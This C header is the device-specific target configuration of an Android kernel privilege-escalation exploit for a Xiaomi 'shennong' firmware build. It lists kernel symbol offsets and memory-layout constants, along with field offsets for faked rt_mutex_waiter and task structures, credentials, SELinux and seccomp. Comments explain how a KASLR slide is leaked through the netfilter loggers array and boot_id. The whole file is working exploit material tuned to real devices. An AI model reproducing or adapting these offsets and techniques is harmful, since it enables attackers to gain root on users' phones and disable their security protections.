#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "shennong_OS3.0.307.0.WNBCNXM_16.0"
#define BUILD_FINGERPRINT "Xiaomi/shennong/shennong:16/OS3.0.307.0.WNBCNXM/user/release-keys"

/* shennong = 39-bit VA(kernel.bin _text 精确命中 KIMAGE_VADDR(39),
 * init_task 自引用 0xffffffc009fef600 佐证;VMEMMAP_START 亦为 39-bit 值):
 *   linear region = [0xffffff8000000000, 0xffffffc000000000)
 *   linear VA = PAGE_OFFSET + 绝对物理地址
 *   (run2 实测 init_task 别名 0xffffff80a9fef600 = PAGE_OFFSET + 0xa9fef600)
 * DRAM:phys [0x80000000, 0x480000000)(16GB);内核镜像加载于 phys 0xa8000000。 */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff9000000000ULL
#define DIRECT_MAP_BASE 0xffffff8080000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* 与 targets/shennong/util.c 的 p0_data_alias 严格一致的编译期版本:
 *   linear 别名 = P0_PAGE_OFFSET + P0_KERNEL_PHYS_LOAD + (image - KIMAGE_TEXT_BASE)
 * common.h 默认 OR 版本锚定 P0_PHYS_OFFSET,只适用于 PHYS_LOAD == PHYS_OFFSET
 * 的机型;shennong 内核加载于 0xa8000000,OR 版会差 2GB(step=4 根因之一) */
#define P0_DATA_ALIAS_CONST(image_addr) \
  (P0_PAGE_OFFSET + P0_KERNEL_PHYS_LOAD + ((image_addr) - KIMAGE_TEXT_BASE))

#define PSELECT_WAITER_WORD_SHIFT 3

#define ASHMEM_MISC_FOPS_OFF 0x0214bec0ULL
#define ASHMEM_FOPS_OFF 0x0126d7b8ULL
#define ASHMEM_IOCTL_OFF 0x00c2db80ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00c2e4b8ULL
#define ASHMEM_MMAP_OFF 0x00c2e510ULL
#define ASHMEM_OPEN_OFF 0x00c2e730ULL
#define ASHMEM_RELEASE_OFF 0x00c2e7b8ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00c2e8d8ULL
#define CONFIGFS_READ_ITER_OFF 0x00461b9cULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x004620ccULL
#define COPY_SPLICE_READ_OFF 0x003e3fa8ULL
#define NOOP_LLSEEK_OFF 0x00396780ULL
#define INIT_TASK_OFF 0x01fef600ULL
#define INIT_UTS_NS_OFF 0x02171eb0ULL
#define EMPTY_ZERO_PAGE_OFF 0x021d0000ULL
#define ROOT_TASK_GROUP_OFF 0x021d7580ULL
#define SELINUX_BLOB_SIZES_OFF 0x015b7788ULL
#define SELINUX_ENFORCING_OFF 0x022293d0ULL
#define SECURITY_HOOK_HEADS_OFF 0x015b7078ULL
#define KMALLOC_CACHES_OFF 0x015b6bb8ULL
#define ANON_PIPE_BUF_OPS_OFF 0x010f7150ULL

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_UTS_NS (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

/* loggers 数组 @ 0xffffffc009fe2910 (kallsyms)。
 * 取 &loggers[1] (0x...2918)：rb_change_child 的写入落进 loggers[2] 空槽，
 * 不碰 loggers[0]/[1] 活着的 logger 指针；boot_id 读 loggers[1] 的内容
 * (= &nfulnl_logger + slide) 正是要泄漏的值。 */
#define SLIDE_NFULNL_LOGGER_OFF 0x01fe29c8ULL
#define SLIDE_LOGGERS_0_1_OFF 0x01fe2918ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02107448ULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x0224a458ULL

#define SLIDE_NFULNL_LOGGER_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

#define WAITER_LOCAL_OFF 0x80
#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF 0x40
#define WAITER_PRIO_OFF 0x44
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF 0x50

#define SLIDE_RT_MUTEX_WAITER_LEGACY 0

/* shennong 6.1.138 rt_mutex_waiter (BTF verified, size 0x58):
 * tree_entry 0x00 / pi_tree_entry 0x18 / task 0x30 / lock 0x38
 * wake_state 0x40 / prio 0x44 / deadline 0x48 / ww_ctx 0x50 */
#define FAKE_WAITER_TREE_PRIO_OFF 0x44
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x44
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x40
#define FAKE_WAITER_WW_CTX_OFF 0x50

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_UCLAMP_REQ_OFF 0x350
#define FAKE_TASK_UCLAMP_OFF 0x358
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950

#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

#define MM_OWNER_OFF 1032
#define TASK_PID_OFF 0x630
#define TASK_TGID_OFF 0x634
#define TASK_REAL_PARENT_OFF 0x640
#define TASK_ATOMIC_FLAGS_OFF 0x5f0
#define TASK_REAL_CRED_OFF 0x830
#define TASK_CRED_OFF 0x838
#define TASK_COMM_OFF 0x848
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x900

#define CRED_UID_OFF 4
#define CRED_SECUREBITS_OFF 36
#define CRED_CAPS_OFF 40
#define CRED_SECURITY_OFF 0x78
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#define PIPE_BUFFER_SIZE 0x28
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_INODE_INFO_STRUCT_SIZE 0xb8
#define PIPE_INODE_INFO_SIZE 0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF 0x60
#define PIPE_TAIL_OFF 0x64
#define PIPE_MAX_USAGE_OFF 0x68
#define PIPE_RING_SIZE_OFF 0x6c
#define PIPE_NR_ACCOUNTED_OFF 0x70
#define PIPE_READERS_OFF 0x74
#define PIPE_WRITERS_OFF 0x78
#define PIPE_FILES_OFF 0x7c
#define PIPE_TMP_PAGE_OFF 0x90
#define PIPE_BUFS_OFF 0xa8
#define PIPE_USER_OFF 0xb0

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

#endif
